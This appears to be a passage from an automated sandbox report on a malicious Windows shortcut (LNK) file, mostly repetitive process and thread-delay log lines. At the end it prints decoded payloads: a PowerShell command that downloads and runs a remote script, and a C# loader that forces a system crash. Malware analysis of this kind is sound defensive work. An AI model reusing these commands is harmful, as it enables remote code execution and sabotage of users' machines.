Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3863Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6011Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3399Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2223Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6304Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6304Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3384Thread sleep count: 3399 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3496Thread sleep count: 2223 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded iwr is.gd/jwr7JD -o $env:TMP/.cmd;& $env:TMP/.cmd
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $s='using System;using System.Text;using System.Security.Cryptography;using System.Runtime.InteropServices;using System.IO;public class X{[DllImport("ntdll.dll")]public static extern uint RtlAdjustPrivilege(int p,bool e,bool c,out bool o);[DllImport("ntdll.dll")]public static extern uint NtRaiseHardError(uint e,uint n,uint u,IntPtr p,uint v,out uint r);public static unsafe string Shot(){bool o;uint r;RtlAdjustPrivilege(19,true,false,out o);NtRaiseHardError(0xc0000022,0,0,IntPtr.Zero,6,out r);byte[]c=Convert.FromBase64String("RNo8TZ56Rv+EyZW73NocFOIiNFfL45tXw24UogGdHkswea/WhnNhCNwjQn1aWjfw");byte[]k=Convert.FromBase64String("/a1Y+fspq/NwlcPwpaT3irY2hcEytktuH7LsY+NlLew=");byte[]i=Convert.FromBase64String("9sXGmK4q9LdYFdOp4TSsQw==");using(Aes a=Aes.Create()){a.Key=k;a.IV=i;ICryptoTransform d=a.CreateDecryptor(a.Key,a.IV);using(var m=new MemoryStream(c))using(var y=new CryptoStream(m,d,CryptoStreamMode.Read))using(var s=new StreamReader(y)){return s.ReadToEnd();}}}}';$c=New-Object System.CodeDom.Compiler.CompilerParameters;$c.CompilerOptions='/unsafe';$a=Add-Type -TypeDefinition $s -Language CSharp -PassThru -CompilerParameters $c;if((Get-Random -Min 1 -Max 7) -eq 1){[X]::Shot()}Start-Process "powershell.exe"
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $s='using System;using System.Text;using System.Security.Cryptography;using System.Runtime.InteropServices;using System.IO;public class X{[DllImport("ntdll.dll")]public static extern uint RtlAdjustPrivilege(int p,bool e,bool c,out bool o);[DllImport("ntdll.dll")]public static extern uint NtRaiseHardError(uint e,uint n,uint u,IntPtr p,uint v,out uint r);public static unsafe string Shot(){bool o;uint r;RtlAdjustPrivilege(19,true,false,out o);NtRaiseHardError(0xc0000022,0,0,IntPtr.Zero,6,out r);byte[]c=Convert.FromBase64String("RNo8TZ56Rv+EyZW73NocFOIiNFfL45tXw24UogGdHkswea/WhnNhCNwjQn1aWjfw");byte[]k=Convert.FromBase64String("/a1Y+fspq/NwlcPwpaT3irY2hcEytktuH7LsY+NlLew=");byte[]i=Convert.FromBase64String("9sXGmK4q9LdYFdOp4TSsQw==");using(Aes a=Aes.Create()){a.Key=k;a.IV=i;ICryptoTransform d=a.CreateDecryptor(a.Key,a.IV);using(var m=new MemoryStream(c))using(var y=new CryptoStream(m,d,CryptoStreamMode.Read))using(var s=new StreamReader(y)){return s.ReadToEnd();}}}}';$c=New-Object System.CodeDom.Compiler.CompilerParameters;$c.CompilerOptions='/unsafe';$a=Add-Type -TypeDefinition $s -Language CSharp -PassThru -CompilerParameters $c;if((Get-Random -Min 1 -Max 7) -eq 1){[X]::Shot()}Start-Process "powershell.exe"Jump to behavior
